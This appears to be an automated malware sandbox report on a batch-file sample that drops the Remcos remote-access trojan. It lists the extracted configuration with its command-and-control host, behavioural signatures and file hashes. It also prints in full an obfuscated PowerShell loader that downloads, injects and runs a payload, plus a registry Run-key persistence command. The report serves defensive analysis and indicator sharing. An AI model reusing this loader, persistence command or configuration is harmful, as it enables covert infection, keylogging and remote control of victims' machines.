Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
23/10/2024, 01:54
Static task
static1
Behavioral task
behavioral1
Sample
e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3.bat
Resource
win7-20241010-en
General
-
Target
e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3.bat
-
Size
5KB
-
MD5
e6e618c4354c26c555872d5398a72086
-
SHA1
76cddb6019c5d76a96de461a85742d766feebca8
-
SHA256
e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3
-
SHA512
0251b7c4f32ad218628d5e71bd80f909e4c124420e47e434b622e280253189e615206d6f6846ac63d66af14500054f38b15f473f5725b541c6921c03e23fea87
-
SSDEEP
96:/ZAmDvLJYo/4xtgIYzTSWteyhFeeOFXsQOEPoxFft7K3/XG3gWTE:amDzafszOaNCXPOkYjKPQgWI
Malware Config
Extracted
remcos
MISS Chy
pelele.duckdns.org:51525
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-TXCR8B
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Blocklisted process makes network request 64 IoCs
flow pid Process 9 1620 powershell.exe 44 3632 msiexec.exe 46 3632 msiexec.exe 50 3632 msiexec.exe 51 3632 msiexec.exe 53 3632 msiexec.exe 54 3632 msiexec.exe 55 3632 msiexec.exe 56 3632 msiexec.exe 57 3632 msiexec.exe 58 3632 msiexec.exe 59 3632 msiexec.exe 60 3632 msiexec.exe 61 3632 msiexec.exe 62 3632 msiexec.exe 63 3632 msiexec.exe 64 3632 msiexec.exe 65 3632 msiexec.exe 68 3632 msiexec.exe 70 3632 msiexec.exe 72 3632 msiexec.exe 73 3632 msiexec.exe 76 3632 msiexec.exe 78 3632 msiexec.exe 79 3632 msiexec.exe 80 3632 msiexec.exe 81 3632 msiexec.exe 82 3632 msiexec.exe 83 3632 msiexec.exe 84 3632 msiexec.exe 85 3632 msiexec.exe 86 3632 msiexec.exe 87 3632 msiexec.exe 88 3632 msiexec.exe 89 3632 msiexec.exe 90 3632 msiexec.exe 91 3632 msiexec.exe 94 3632 msiexec.exe 97 3632 msiexec.exe 99 3632 msiexec.exe 100 3632 msiexec.exe 102 3632 msiexec.exe 103 3632 msiexec.exe 105 3632 msiexec.exe 116 3632 msiexec.exe 117 3632 msiexec.exe 118 3632 msiexec.exe 119 3632 msiexec.exe 120 3632 msiexec.exe 121 3632 msiexec.exe 122 3632 msiexec.exe 123 3632 msiexec.exe 124 3632 msiexec.exe 125 3632 msiexec.exe 126 3632 msiexec.exe 127 3632 msiexec.exe 128 3632 msiexec.exe 129 3632 msiexec.exe 130 3632 msiexec.exe 131 3632 msiexec.exe 132 3632 msiexec.exe 133 3632 msiexec.exe 134 3632 msiexec.exe 135 3632 msiexec.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 1620 powershell.exe 2244 powershell.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Diversify = "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\\Software\\ledernes\\').Snarliest;%Dowdily% ($Wasnt)" reg.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 3632 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2244 powershell.exe 3632 msiexec.exe -
System Location Discovery: System Language Discovery 1 TTPs 4 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2508 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 1620 powershell.exe 1620 powershell.exe 2244 powershell.exe 2244 powershell.exe 2244 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 2244 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 2244 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 3632 msiexec.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2068 wrote to memory of 1620 2068 cmd.exe 87 PID 2068 wrote to memory of 1620 2068 cmd.exe 87 PID 2244 wrote to memory of 3632 2244 powershell.exe 100 PID 2244 wrote to memory of 3632 2244 powershell.exe 100 PID 2244 wrote to memory of 3632 2244 powershell.exe 100 PID 2244 wrote to memory of 3632 2244 powershell.exe 100 PID 3632 wrote to memory of 4104 3632 msiexec.exe 103 PID 3632 wrote to memory of 4104 3632 msiexec.exe 103 PID 3632 wrote to memory of 4104 3632 msiexec.exe 103 PID 4104 wrote to memory of 2508 4104 cmd.exe 105 PID 4104 wrote to memory of 2508 4104 cmd.exe 105 PID 4104 wrote to memory of 2508 4104 cmd.exe 105
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\e0d9ebe414aca4f6d28b0f1631a969f9190b6fb2cf5599b99ccfc6b7916ed8b3.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1620
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Pseudobegivenhedens Implume Tehsildar Indskudsbrt burreskrmenes #>;$Pligtmenneskers='Solfegens';<#Splenomegalia Muoniums Plateauing Endomitosis Anisidin Uncial #>;$Chromoisomerism=$Pediculus+$host.UI; function Dtente($Sizier){If ($Chromoisomerism) {$Brugeradgangskodernes++;}$Trangam=$Bedighted34+$Sizier.'Length'-$Brugeradgangskodernes; for( $John=4;$John -lt $Trangam;$John+=5){$Tremplin=$John;$Okkupationsmagters+=$Sizier[$John];$Nucleolocentrosome='Sodavander';}$Okkupationsmagters;}function Trindt94($Confluxes){ & ($Afhjemledes) ($Confluxes);}$Silicomethane=Dtente 'striM SlioPaa,zTraniun.tlDirel ena Non/Sand ';$Silicomethane+=Dtente 'Term5,che.St c0 oo Temp( eknWTh.niF yvnForad ToporeitwUnwis Ann FlopNpur TMilh far1Bill0Cryp.smad0C no;Lage AjoWListi H.on Ent6Fors4 Tri;Byr. SlixSi,d6.eso4Sp n; Inc RadirwillvHyp :Kalm1 Min3.ege1Resp.Dvrg0 Pas)Laes SufG Re eB,erc aktk RucoEphe/Atry2Af.t0 Met1stri0 ens0 Beh1Iled0Gips1 Non Kur,FIn.kiTyderForeeaandfEngeoKommxAfsv/Jeop1 Ant3Stif1Skov.Kifs0 .nt ';$Reunify=Dtente 'prisUArbeSGelsECrysRSelv-Se iAMarlGUn eE Yden InltUmis ';$Geophones=Dtente 'CytohMiratsalstStr p Sy s Di : For/Font/Dngep Mo.lcampi A,teK bblFl,ntRecodUn.e.BindtWeiroKantpUnpl/taasMNatiiCounsE.emoAlkagEartyTerrnUnstiByg sS amtTe.tsObno.OverpTemifStram B y ';$Ancienty=Dtente 'Udgi> Out ';$Afhjemledes=Dtente 'LaboiCresE Na xH.nd ';$Afmarchernes='Militre';$Glendon='\Overtidsbetalings.Del';Trindt94 (Dtente 'Udpe$ yvgAfdrl SulOextrb mpaOve L ods:EskaR yanoWedgo ,oss N neTarc1Lane1Gaas0Ansk=Lati$Sma eI denS.orv En,:RestaBrugPPustPAdfrD enuABetitL ciaarge+Pre $SpergMod lGuerEGeocnBe yDungao,rannMidt ');Trindt94 (Dtente ' opl$EfteGAd iLSistoNrreBH lva OvelR,ig:UngeuRecaNUnprDFutuEFungT nduERigeRHer.ISte.OPardR Mera ataT My.iDeconInlegPatr= Far$ Ming Grue uldo Sn.p lokH AfvoLag,nOverE AutSSkri.t.voSPlaiP Ma.LencoiambutPros( han$nonraAvenNTambCAn,sI uptEBrutn,ravt FriYWfru) Plo ');Trindt94 (Dtente ' atr[ oneNIn,reSi itCamb.NonfsSpl eFrilrSqueVOveriCaroCefteEsektP P ioTogsi P.tNUdvlTSkovmAcetapre nEk.ea SunGJahvEBeterSove] K,y:Scle:Srt SChareHj tCForbUAppeRRensiDefeT SibYMatrpGarirCandoKlimT RtwOGravcistiODichlKrab Ind = Co ove [OverN mpae.rest Ce..larySTince ranc Auru ThwrFluoiAdrat TakYEdifPMediRStupo Kont PiloSanecTr loBukslKiloTDiasyInkvP uaE Gra]G,os: Eri:PrettS bolEry Sdisk1Kr d2Rev, ');$Geophones=$Undeteriorating[0];$Kniplens=(Dtente 'Lset$Skv,gForsLbilfofr sB ManAM dsL Cat: .abgBa.ieP neS RomT Br,uDesiS eaE arsr rennVrtrEForm= ren Sile CcmWUdla-Inflo NonB RinjHesteB nbCVrksTkupf Bro SU gaYo slSNomoTA.ciEkateM Sup.AffoNRackEIntetEmbo.ParaW HorE.ndsBunclC BillaflviCarbE R.gNFlo TDeb, ');Trindt94 ($Kniplens);Trindt94 (Dtente 'Epor$ReceGSodaeVa is,reet OveuLap,sPa aeMo,irTyngnRealejord.Su,tHPorte choa TwidEmsce NonrAftvsKera[Eloi$TobaRRengeTer uKononSaddiPostfS,ntytal ] Niv=Anse$SkakSSpiniGennl Ma i Co,ceffoo NonmP,roe MectBredh lfmanonenWrise Mae ');$Lumpingly=Dtente ' ssi$C unGFo be Orks umrt,riauCrousBrmeeD tar remnGidseFeto.,rdkD opioSanawOttenUnefl TotoIndtaRnk,dUdebF Mari UdllVaabeBrdr( Kas$CirkGCaseePoz o rthpStenhS ako orrnUdvieWeddsCloi,Stan$Pla AOplyaNastuorro)Fili ';$Aau=$Roose110;Trindt94 (Dtente ',ffo$Do.kgStopLC,mpOripsBHaraAS lilKn c:P ctNIndeEEffld uesMa,ylTrilaGastG orft RulEShe,n AgndO,ereJob.= ags(Assut Hy eNonrsOvertrest-S pePJambaBevitGalih Sta Fad$ObelAPre a LevuAmet) Fab ');while (!$Nedslagtende) {Trindt94 (Dtente 'unex$KopigRaffl GenoIrrebina.aWuchlT.ch:TeboPHieriIndvlMedifU.efe Fr,r .aaeQtd rSubdstzar=Inex$,ikttSandrO ttuAr bea ar ') ;Trindt94 $Lumpingly;Trindt94 (Dtente ' yposKupeTKrykale erEmbrTKoge- Ca,SPo yLT caeSkate Prop Bel Skov4fant ');Trindt94 (Dtente 'Abb $Ma.lgDewhl K aoStinBSansAUds lR nd:Bru N l vE Raad KomsSal lIn eaOuttG vertmi rEForrnDi hDBinreArti=Gluc( nmitTykke AkksAukttVa,i-HorapNa.pATi cTMo khDeco Uso,$ samARemoA Q auAcqu)Plad ') ;Trindt94 (Dtente 'Drtr$ rkeG.undLAfkoO ArrBStifARiveLsupe: ,awBFemin R wNJordeFjerNDigt=Begr$P ragParilFagmoFi gbL,ndAThorL Kyn:Aho,SJen tUpstEIndtl,ntrlSophe Em.R draIDerid Be +Auto+ Re % F.u$ Cytu Galn GeldBieneUdreTGlobEKuv R U,miIst o.eknrChocAbradtPapii de nSev gA,ta.M crC TaloSy oUAr mNChevTEn,a ') ;$Geophones=$Undeteriorating[$Bnnen];}$Ahorntrets=344157;$Sknhedsdronningerne=29981;Trindt94 (Dtente 'Angl$PoligHv.vl.agrO YesB riASpidLForb: PreATophlOp kQModeULftei M sfIm.rO ForU Ers1Vare1P,ll9Prog Tam =Treh MyriGChefEBasitRens-Sedac GlaO br.nLo.iTKao E crunSandTNone Mini$BifiABarra UdfU Aut ');Trindt94 (Dtente 'Bi l$O tmgInd lQuinoLecab CoraF,rhlNati:Ba.gSSrprt Hino NavfOvermT aanFomegTarrd F,ae ArbnRe es Bun As e= Bur B nk[XenoSErkeyRecksApnet D,deKnojmKron.InteC hi,oProln SutvS,nke roar Sv tGri ] Cho:Best:Te eFKamprIntroRet mForsBUnreaUplisSubee Spe6 An 4 keSHarptInter ideiSpecnAdd gUran(Rat $ProsAC ocl RigqMalfuSkagiAmidfHoeroMoniuComf1Stri1Feli9 Mas)Sp,n ');Trindt94 (Dtente ' ype$Be.oGCousLRa dOKameBFru aU mil run:hoveDpotaaRockRErhvKPyrhsFil, Mou=Syvm Bere[ rinSfrdsY MasS Rvet KleETilmmFisk.Syntt HjeeUninXU.iltmikr. niteBjarNUmbrcPar o roaDcongiTromnmouzg X n]Stra:Pate: DivaAfsysPterCMariIHuleiN.nf. afsgEufoeDeraTNonpsS,leTC onrIndlIBoofN Sapg cyc( nte$Roqus EjetMurnoUndefnuptm ReknStikGCuidd Ph EHertNStensuini) Sa ');Trindt94 (Dtente 'Tils$HansgMontLVv.ro re.BPrv ACololHema:.ootH ffoF.emvdiffeDye kBi.bA KatTramiaPr,fl S bOVs nGTi,seHel tVe,m=Dipl$EngldIndiARestRVigekReviS Nu.. NonsUnreuOut.bLev,SPh.etBorgRSjklIR glnRapsGRe.i(Knla$FeteaVenlHAktioTongrStdenSti TFor rCongeSo.iT,iliSP,nt,sluk$AftasDds.kGud,nMetahE,zoEUnweDK,ivsparedKo,tRfleeoFugtN patnDeciIsupeNTromgDypneMelaRTrusNDer EMas )An i ');Trindt94 $Hovekataloget;"1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"2⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3632 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Diversify" /t REG_EXPAND_SZ /d "%Dowdily% -windowstyle 1 $Wasnt=(gp -Path 'HKCU:\Software\ledernes\').Snarliest;%Dowdily% ($Wasnt)"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2508
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5cdff7fd0366055264319861183148639
SHA1e059bfb673d0c7f469073f5fb45cab9977036abb
SHA2565e32db49b7c086a3445d10caf19fd048f3f4172588615ce9a0c9c475e1df76e0
SHA5123f79138f8eaf5c6a6729f9c33dc7c74b503acd08b2ea0676a38797e4fe9f838ed595d51946f5d14b322afe3cba092682cc012dc375b3ee20b04063fc7648025b
-
Filesize
1KB
MD5d336b18e0e02e045650ac4f24c7ecaa7
SHA187ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA25687e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
487KB
MD52bddc5ba5ca1835b93004447e25041e5
SHA1f494fc24f0056c569750f90f8325b6cc011919d2
SHA256e28a506c658753a74aec3611452c57cb09c8c4da75d285661ac1a6450a1d4afd
SHA51213f77faecbc1b255e04684ac3732f14f156281c17b961275523073a20f98bc029430cbc7adb6ae9848f2823035eeab31758e9790a018f46627ffb04fa0643515